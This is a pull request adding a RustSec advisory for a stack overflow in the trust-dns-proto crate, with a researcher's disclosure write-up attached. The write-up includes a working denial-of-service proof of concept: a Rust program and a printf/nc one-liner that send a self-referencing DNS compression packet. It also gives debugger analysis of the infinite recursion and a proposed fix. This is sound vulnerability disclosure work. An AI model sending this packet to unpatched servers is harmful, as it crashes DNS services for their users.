### PR TITLE
Trust-DNS: Stack overflow when parsing DNS packet

### DIFF
--- a/crates/trust-dns-proto/RUSTSEC-0000-0000.toml
+++ b/crates/trust-dns-proto/RUSTSEC-0000-0000.toml
@@ -1,0 +1,60 @@
+[advisory]
+# Identifier for the advisory (mandatory). Will be assigned a "RUSTSEC-YYYY-NNNN"
+# identifier e.g. RUSTSEC-2018-0001. Please use "RUSTSEC-0000-0000" in PRs.
+id = "RUSTSEC-0000-0000"
+
+# Name of the affected crate (mandatory)
+package = "trust-dns-proto"
+
+# Disclosure date of the advisory as an RFC 3339 date (mandatory)
+date = "2017-10-09"
+
+# Single-line description of a vulnerability (mandatory)
+title = "Stack overflow when parsing malicious DNS packet"
+
+# Enter a short-form description of the vulnerability here (mandatory)
+description = """
+There's a stack overflow leading to a crash when Trust-DNS's parses a
+malicious DNS packet.
+
+Affected versions of this crate did not properly handle parsing of DNS message
+compression (RFC1035 section 4.1.4). The parser could be tricked into infinite
+loop when a compression offset pointed back to the same domain name to be
+parsed.
+
+This allows an attacker to craft a malicious DNS packet which when consumed
+with Trust-DNS could cause stack overflow and crash the affected software.
+ 
+The flaw was corrected by trust-dns-proto 0.4.3 and upcoming 0.5.0 release.
+"""
+
+# Versions which include fixes for this vulnerability (mandatory)
+patched_versions = [">= 0.4.3", ">= 0.5.0-alpha.3" ]
+
+# Versions which were never vulnerable (optional)
+#unaffected_versions = ["< 1.1.0"]
+
+# URL to a long-form description of this issue, e.g. a GitHub issue/PR,
+# a change log entry, or a blogpost announcing the release (optional)
+# url = ""
+
+# Keywords which describe this vulnerability, similar to Cargo (optional)
+keywords = [ "stack-overflow", "crash" ]
+
+# Vulnerability aliases, e.g. CVE IDs (optional but recommended)
+# Request a CVE for your RustSec vulns: https://iwantacve.org/
+#aliases = ["CVE-2018-XXXX"]
+
+# References to related vulnerabilities (optional)
+# e.g. CVE for a C library wrapped by a -sys crate)
+#references = ["CVE-2018-YYYY", "CVE-2018-ZZZZ"]
+
+# CPU architectures impacted by this vulnerability (optional)
+# For a list of CPU architecture strings, see the "platforms" crate:
+# <https://docs.rs/platforms/latest/platforms/target/enum.Arch.html>
+#affected_arch = ["x86", "x86_64"]
+
+# Operating systems impacted by this vulnerability (optional)
+# For a list of OS strings, see the "platforms" crate:
+# <https://docs.rs/platforms/latest/platforms/target/enum.OS.html>
+#affected_os = ["windows"]


### PR DESCRIPTION
Ping @bluejekyll. This issue has been fixed in `trust-dns-proto` crate versions 0.4.3 and 0.5.0-alpha.3.

Since I haven't published my writeup about this issue anywhere else, I'll post it here for reference.

# Trust-DNS Stack Overflow when parsing malicious DNS query ("DNS C00C bug")

by Ossi Herrala, SensorFu Ltd, 2018-10-09

## 0x00: Summary

There's a stack overflow leading to a crash when Trust-DNS (client, server, resolver) receives a malicious DNS packet. This can be considered a Denial of Service vulnerability.

The following Proof of Concept is tested and analysis done with Trust-DNS based server running on macOS Sierra 10.12.6.

## 0x01: Proof of Concept

This PoC expects Trust-DNS's "named" server to listen on localhost port 1053. The PoC constructs a malicious DNS query packet, where the queries section contain one query with self referencing DNS Name using DNS label compression (RFC1035 4.1.4).

Start Trust-DNS's "named" (commit c814d4953e420ae94e1e374a0de3de1b4c9a943a):

```console
$ ../target/debug/named -c ./tests/named_test_configs/example.toml -z ./tests/named_test_configs/ -p 1053
```

PoC code:

```rust
use std::{io, net};
fn main() -> io::Result<()> {
    // 4.1.1. Header section format, https://tools.ietf.org/html/rfc1035#section-4.1.1
    // 4.1.2. Question section format, https://tools.ietf.org/html/rfc1035#section-4.1.2
    // 4.1.4. Message compression, https://tools.ietf.org/html/rfc1035#section-4.1.4
    let buf = vec![
        0x00, 0x00, // ID
        0x00, 0x00, // QR, opcode, etc.
        0x00, 0x01, // QDCOUNT = 1, one query
        0x00, 0x00, // ANCOUNT = 0
        0x00, 0x00, // NSCOUNT = 0
        0x00, 0x00, // ARCOUNT = 0
        0xC0, 0x0C, // label compression, jump back to byte offset 12 (previous byte)
    ];
    let socket = net::UdpSocket::bind("0.0.0.0:0")?;
    socket.send_to(&buf, "127.0.0.1:1053")?;
    Ok(())
}
```

Or compressed as shell oneliner:

```sh
printf "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\xC0\x0C" | nc -u 127.0.0.1 1053
```

## 0x02: Analysis

The server program crashes with the following output (macOS Sierra 10.12.6):

```
thread 'main' has overflowed its stack
fatal runtime error: stack overflow
Abort trap: 6
```

Session with `rust-lldb`, we get the following:

```
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x7fff5f400f78)                                                                      
    frame #0: 0x0000000100412426 named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f402318) at name.rs:853
   850      /// This will consume the portions of the Vec which it is reading...
   851      fn read(decoder: &mut BinDecoder<'r>) -> ProtoResult<Name> {
   852          let mut state: LabelParseState = LabelParseState::LabelLengthOrPointer;
-> 853          let mut labels: Vec<Label> = Vec::with_capacity(3); // most labels will be around three, e.g. www.example.com                                                    
   854
   855          // assume all chars are utf-8. We're doing byte-by-byte operations, no endianess issues...                                                                       
   856          // reserved: (1000 0000 aka 0800) && (0100 0000 aka 0400)
```

Looking at the backtrace shows we are recursively calling Name::read():

```
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x7fff5f400f78)
  * frame #0: 0x0000000100412426 named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f402318) at name.rs:853
    frame #1: 0x00000001004129ee named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f402f38) at name.rs:904
    frame #2: 0x00000001004129ee named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f403b58) at name.rs:904
    frame #3: 0x00000001004129ee named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f404778) at name.rs:904
    frame #4: 0x00000001004129ee named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f405398) at name.rs:904
```

Going up a stack frame:

```
(lldb) up
frame #1: 0x00000001004129ee named`_$LT$trust_dns_proto..rr..domain..name..Name$u20$as$u20$trust_dns_proto..serialize..binary..BinDecodable$LT$$u27$r$GT$$GT$::read::hc4e28a7f30019544(decoder=&0x7fff5f402f38) at name.rs:904
   901                  LabelParseState::Pointer => {
   902                      let location = decoder.read_u16()? & 0x3FFF; // get rid of the two high order bits
   903                      let mut pointer = decoder.clone(location);
-> 904                      let pointed = Name::read(&mut pointer)?;
   905 
   906                      for l in &*pointed.labels {
   907                          labels.push(l.clone());
```

we can see variables:

```
(lldb) frame variable
(trust_dns_proto::serialize::binary::decoder::BinDecoder *) decoder = &0x7fff5f402f38
(trust_dns_proto::rr::domain::name::LabelParseState) state = Pointer
(alloc::vec::Vec<trust_dns_proto::rr::domain::label::Label>) labels = vec![]
(unsigned short) location = 12
(trust_dns_proto::serialize::binary::decoder::BinDecoder) pointer = BinDecoder {
buffer: &['\0', '\0', '\0', '\0', '\0', '\x01', '\0', '\0', '\0', '\0', '\0', '\0', '', '\f'], 
index: 12
}
```

Looking at the code from `proto/src/rr/domain/name.rs` lines 901 -- 912 (commit 35b666f8aa426a20c0117a7393558e1eb4fa6d66):

```rust
846:  impl<'r> BinDecodable<'r> for Name {
847:      /// parses the chain of labels
848:      ///  this has a max of 255 octets, with each label being less than 63.
849:      ///  all names will be stored lowercase internally.
850:      /// This will consume the portions of the Vec which it is reading...
851:  fn read(decoder: &mut BinDecoder<'r>) -> ProtoResult<Name> {
...
901:        LabelParseState::Pointer => {
902:            let location = decoder.read_u16()? & 0x3FFF; // get rid of the two high order bits
903:            let mut pointer = decoder.clone(location);
904:            let pointed = Name::read(&mut pointer)?;
905:        
906:            for l in &*pointed.labels {
907:                labels.push(l.clone());
908:            }
909:        
910:            // Pointers always finish the name, break like Root.
911:            break;
912:        }
```

shows that on line 904 the call to Name::read() tries to parse a compressed DNS label from offset provided by the DNS packet and read on line 902. When the compressed label points to itself, an infinite recursion happens leading to stack overflow.

## 0x03: Proposal

RFC1035 4.1.4 (Message compression) mentions

> "In this scheme, an entire domain name or a list of labels at the end of a domain name is replaced with _a pointer to a prior occurance of the same name_."

In Trust-DNS's case, the current logic allows compression pointer to point to current name as well as prior names. The logic could be changed to allow pointers only to DNS packet content prior to current DNS Name.

# 0xFF: End of Message


